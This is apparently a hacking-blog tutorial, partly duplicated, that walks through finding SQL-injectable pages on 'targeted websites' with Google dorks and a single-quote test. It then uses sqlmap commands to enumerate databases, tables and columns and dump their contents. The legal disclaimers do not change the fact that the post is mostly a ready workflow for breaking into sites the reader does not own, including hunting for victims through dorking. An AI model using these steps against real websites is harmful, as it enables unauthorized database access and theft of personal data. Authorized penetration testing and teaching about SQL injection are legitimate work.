This post is about using tool for Penetration Testing that is SQL MAP. Once we get some error on website regarding sql then we can exploit that vulnerability using sql map. But first we need to find some vulnerable links of a targeted websites.
HOW TO FIND SQL ERROR IN A TARGETED WEBSITE??
Now the real game starts for exploiting that vulnerable link.
Step 01 :- sqlmap -u "Vulnerable URL" and press enter
Step 05 :- sqlmap -u "Vulnerable URL" --data "Paste the Payload here" and press enter
Step 08 :- sqlmap -u "Vulnerable URL" --data "Payload" --tables -D chosen_database
Here is video for this topic
NOTE:
With out prior permition of Developer or Admin of the Website or Webaplication it is illegal to test it for any Vulnerability assessment.
Terms & Warning:
Use this post for educational purposes only and for your self knowledge.
Pro Hack Tricks Blog Team, its Author, Admin cannot be held responsible for any legal action or other action taken against you if you use this script illegally. Use at your own risk. But remember no one is untraceable.
HOW TO FIND SQL ERROR IN A TARGETED WEBSITE??
So For getting targeted links of a website you need to use google dorks for Example- site: "Targeted website" inurl:.php?id= (Without double quotes). As you will get links related to this then you can open the links and put single quote( ' ) after the link and check vulnerability. If the links the is vulnerable then sql error will pop up like this (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1) this is just an example. The error for sql includes SQL in it so you only have to check if sql is listed in it and might also be the mysql error it is also the part of SQL. Some where it should be SQL then it is vulnerable.
Now the real game starts for exploiting that vulnerable link.
So now you need SQL MAP and i will use in KALI LINUX (This OS is used by HACKERS). You can use in WINDOWS, MAC, UBUNTU in all the OS steps are same.
Step 01 :- sqlmap -u "Vulnerable URL" and press enter
Step 02 :- Check whether the Vulnerable URL is injectable or not.
Here url is Vulnerable so i will get injection point.
Step 03 :- If you get any injection point, then choose the injection point that you want to apply.
Step 04 :- These injection points found by SQLMap are also saved in sqlmap specified address.
You can directly copy PAYLOAD from SQLMAP also here i will directly copy from SQLMAP
Step 05 :- sqlmap -u "Vulnerable URL" --data "Paste the Payload here" and press enter
Step 06 :- sqlmap -u "Vulnerable URL" --data "Payload" --dbs (to get the available databases)
Step 07 :- Choose the database and fetch the tables.
Step 08 :- sqlmap -u "Vulnerable URL" --data "Payload" --tables -D chosen_database
Step 09 :- Fetch the columns now of chosen tables.
Step 10 :- sqlmap -u "Vulnerable URL" --data "Payload" --columns -D chosen_database -T chosen_table
You can fetch multiple columns by adding (,) to the column name.
Step 11 :- Get the data of all columns of chosen_table by dumping it.
Step 12 :- sqlmap -u "Vulnerable URL" --data "Payload" --dump -D chosen_database -T chosen_table
You have now dump of the following data base.
Here is video for this topic
NOTE:
With out prior permition of Developer or Admin of the Website or Webaplication it is illegal to test it for any Vulnerability assessment.
Use this post for educational purposes only and for your self knowledge.
Pro Hack Tricks Blog Team, its Author, Admin cannot be held responsible for any legal action or other action taken against you if you use this script illegally. Use at your own risk. But remember no one is untraceable.
Damn helpful and Gr8ly explained !!! :)
ReplyDeleteThank you.
Delete